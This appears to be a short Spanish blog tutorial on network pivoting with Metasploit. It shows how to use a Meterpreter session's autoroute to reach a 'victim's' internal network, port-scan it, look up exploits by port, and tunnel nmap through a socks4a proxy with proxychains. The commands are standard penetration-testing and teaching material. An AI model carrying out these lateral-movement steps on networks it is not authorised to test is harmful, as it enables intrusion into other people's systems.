Pivotenando con meterpreter y metasploit



Lo primero que hay que hacer el saber la ip local del equipo para ello en el meterpreter se coloca el comando ifconfig, el cual arrojara toda la información de lar tarjetas de red del equipo


Interface 11
============
Name         : Controladora Gigabit Broadcom NetXtreme 57xx
Hardware MAC : 05:13:72:2c:18:14
MTU          : 1500
IPv4 Address : 169.254.200.42
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::1104:ed89:8675:c82a

IPv6 Netmask : ffff:ffff:ffff:ffff::

ahora simplemete con el comando. autoroute el se encargara de generar el enrrutamiento dentro de metasploit.

run autoroute -s 169.254.0.0/24 
run autoroute -p


este es simplemente un ejemplo. Y ahora ya se pueden utilizar los auxiliares que trae metasploit con la session de meterpreter. para poder utilizar los auxiliares hay que deja la session en modo demonio para que siga trabajando aun cuando no estemos dentro de la sesion. para ello se utiliza el comando.
background. Con este comando simplemente no devuelve a la otra interfaz.

Hacer escaneo de puertos a la red interna donde se encuentra la victima

Hay que utilizar el auxyliar llamada port_scan
de la siguiente forma lo llamamosm estando en la consola de metasploit


msf exploit(handler) > use auxiliary/scanner/portscan/tcp


vamos a ver que opciones tiene
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

Ahora se tiene que signar los host a escanear y los pueryos y el numero de conurrencias

set rhost 169.254.0.0/24
set ports 1-80
set theards 20
y ahora para que se ejecute se pude con el comando exploit o run pero como por etica se utiliza run

donde arrijara algo como esto
[*] 192.168.0.13:23 - TCP OPEN
[*] 192.168.0.12:23 - TCP OPEN
[*] 192.168.0.11:23 - TCP OPEN
[*] 192.168.0.1:80 - TCP OPEN
[*] 192.168.0.11:80 - TCP OPEN
[*] 192.168.0.13:80 - TCP OPEN
[*] 192.168.0.16:135 - TCP OPEN
[*] 192.168.0.16:139 - TCP OPEN
[*] 192.168.0.16:445 - TCP OPEN
[*] 192.168.0.14:139 - TCP OPEN
[*] 192.168.0.14:135 - TCP OPEN
[*] 192.168.0.16:2968 - TCP OPEN
[*] 192.168.0.16:3389 - TCP OPEN
[*] 192.168.0.14:445 - TCP OPEN


Buscar Exploit para puertos en especifico

Estando en la consola de metasploit hacemos lo siguiente
msf > irb
>> framework.exploits.each_module { |n,e| x=e.new; print_good("#{e.fullname}: #{x.datastore['RPORT']}") if x.datastore['RPORT'].to_i == 445   }; nil

donde el 445 es el puerto que seamos buscar en este caso voy a probar con ese 2968



Utilizar proxychains

Usar el auxyliar
use auxiliary/server/socks4a
Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy 

y ejecutarlo
luego modificar el archivo de configuracion de proxychains  y colocar el puerto 1080 o el que se le configure al socks para utilizar cualquier herramienta fuera del metasploit con el proxychains y redirija el trafico hacia  la red interna de la victima


proxychains nmap -sT -P0 192.168.0.14



0 Comentarios